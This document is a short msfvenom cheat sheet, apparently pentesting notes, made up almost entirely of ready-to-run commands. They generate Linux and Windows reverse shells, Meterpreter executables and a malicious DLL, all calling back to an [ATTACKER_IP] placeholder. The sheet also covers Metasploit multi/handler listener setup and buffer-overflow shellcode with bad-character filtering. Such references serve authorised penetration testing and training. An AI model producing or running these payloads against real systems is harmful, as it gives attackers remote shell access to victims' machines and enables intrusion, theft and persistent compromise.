MSFVENOM

https://github.com/rapid7/metasploit-framework/blob/master/msfvenom

Basis

Payloads naming convention : [OS]/[arch]/[payload]

msfvenom --list payloads
List payloads.

Linux Reverse Shell

Msfvenom Payloads

msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT]
Generate a Linux reverse shell.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x86.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f elf > reverse.elf
Generate a Meterpreter Reverse Shell for Linux x64.

Metasploit Handler

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp
exploit
Handler for linux (efl) reverse shell.

Windows Reverse Shell

Msfvenom Payloads

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exe
Generate a meterpreter reverse shell exe.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f dll -o msfvenom_revshell.dll
Generate a malicious DLL (meterpreter reverse shell).

Metasploit Handler

use exploit/multi/handler

**set payload windows/x64/meterpreter/reverse_tcp **
exploit
Handler for Windows Meterpreter.

Windows Shellcode (Buffer Overflow)

msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] EXITFUNC=thread -f c -b "\x00\x07\x08\x2e\x2f\xa0\xa1"
Gen Reverse Shell in Shellcode (specify bad chars).

Flags

-b "\x00"
Specify bad characters (always put at least null byte).

-f c
File Type (here it's c file).

-a x86
Architecture.